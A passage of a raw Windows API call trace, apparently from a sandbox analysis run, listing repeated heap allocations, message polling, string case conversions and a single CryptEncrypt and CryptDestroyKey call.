[0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.517] CharLowerBuffW (in: lpsz="byte[32280]", cchLength=0xb | out: lpsz="byte[32280]") returned 0xb [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.518] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.518] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.518] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.519] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24bf868*, pdwDataLen=0x8bef68*=0x7e14, dwBufLen=0x7e18 | out: pbData=0x24bf868*, pdwDataLen=0x8bef68*=0x7e18) returned 1 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0206.520] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.522] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.522] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.523] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.523] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.523] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.523] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.523] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.524] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.524] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.524] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.524] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.524] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.525] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.525] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.525] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.525] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.525] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.526] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.526] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.534] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.534] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.534] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0206.535] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.535] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0206.535] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.535] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.535] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.535] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.536] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.536] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.536] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.537] CryptDestroyKey (hKey=0xaa5820) returned 1 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a9e68 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.537] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.537] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.537] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.537] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.537] RtlAllocateHeap 